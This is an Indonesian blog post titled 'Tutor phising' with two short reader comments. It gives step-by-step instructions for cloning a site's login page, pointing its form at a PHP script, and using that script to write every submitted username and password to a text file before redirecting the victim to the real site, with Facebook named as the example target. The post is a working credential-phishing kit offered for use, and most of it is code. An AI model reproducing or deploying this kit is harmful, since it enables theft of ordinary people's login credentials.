Subcribe And Share :

Twitter icon facebook icon Digg icon Technorati icon facebook icon Delicious icon More share social bookmark service

Selasa, 03 Agustus 2010

Tutor phising

 Tutor phising
Submitted by DNZ on Thu, 22/07/2010 - 10:32

1. pilih site target yg mau dijadiin halaman phising
2. liat source codenya, klik kanan => source bisa juga ctrl+u trus save jadi index.htm
3. buka index.html yg tadi pake notepad, cari kata "action=" biasanya ketemu yg kaya gini
Code:


--------------------------------------------------------------------------
<form action="RANDOM URL" method="post">

--------------------------------------------------------------------------
4. ganti url "RANDOM URL" jadi write.php trus ganti "post" jadi get
5. save
6. bikin "write.php"
Code:

----------------------------------------------------------------------------------------
<?php
header("Location: http://RANDOM");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

---------------------------------------------------------------------------------------
7. ganti tulisan yg http://RANDOM diatas jadi alamat yg diphising misal http://facebook.com
8. save
9. upload deh dalam direktori yg sama.

jangan lupe chmod 777 di file password.txt



moga bermanfaat yeee..



dnz
Tags: Artikel Source Code


demo template blog and download free blogger template feature like magazine style, ads ready and seo friendly template blog
DheTemplate is galleries new free blogger template with a good design and layout include feature ready added for your blog. DheTemplate.com - NEW FREE BLOGGER TEMPLATE EVERYDAY !!

2 komentar:

bh0ttu mengatakan...

wew... :D

otnir mengatakan...

heheheheh dpt copas bro d forum :D

Templates